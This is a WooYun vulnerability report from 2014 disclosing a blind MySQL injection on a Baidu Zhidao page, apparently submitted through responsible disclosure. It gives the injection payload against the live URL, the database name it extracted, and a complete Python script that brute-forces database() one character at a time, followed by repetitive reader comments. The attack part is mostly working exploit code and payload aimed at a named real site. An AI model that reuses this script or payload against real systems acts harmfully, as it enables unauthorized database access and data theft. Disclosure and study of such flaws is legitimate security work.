缺陷编号:WooYun-2014-089469
漏洞标题:百度某站点MySQL注射(附验证脚本)
相关厂商:百度
漏洞作者:lijiejie
提交时间:2014-12-31 10:53
公开时间:2015-02-14 10:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
2014-12-31: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-14: 细节向公众公开
百度某站点MySQL注射(附验证脚本)
注射点:
1 |
http://zhidao.baidu.com/c/ah189" and mid(lower(database()),1,1)="c" and "1"="1 |
以上猜解database()第一个字符是c。
猜解database(),得到:
1 |
company |
猜解user(),得到:
1 |
[email protected]* |
验证脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
#encoding=gbk<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {<br> 'Cookie': '',<br> 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',<br> }payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')print 'Try to retrive database():'<br> user = ''<br> for i in range(1, 8):<br> for payload in payloads:<br> conn = httplib.HTTPConnection('zhidao.baidu.com', timeout=60)<br> s = '" and mid(lower(database()),%s,1)="%s" and "1"="1' % (i, payload)<br> conn.request(method='GET',<br> url= '/c/ah189' + urllib.quote(s),<br> headers = headers)<br> html_doc = conn.getresponse().read().decode('utf-8')if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0:<br> user += payload<br> print '\n[In Progress]', user<br> break<br> else:<br> print '.',<br> conn.close()print '\n[Done], current db is', user |
过滤
危害等级:高
漏洞Rank:10
确认时间:2014-12-3115:48
感谢提交,已通知业务部门处理
暂无
我靠居然是这个站。。 @lijiejie 你绝对有神器!
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
我靠居然是这个站。。 @lijiejie 你绝对有神器!
直接写原生SQL啊
我靠居然是这个站。。 @lijiejie 你绝对有神器!
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
到底是哪个站...
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
李姐姐猪肉太强了。
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
我靠居然是这个站。。 @lijiejie 你绝对有神器!
我靠到底是哪个站。。 @lijiejie 你绝对有神器!
@ lijiejie 你绝对有神器!
原文连接
的情况下转载,若非则不得使用我方内容。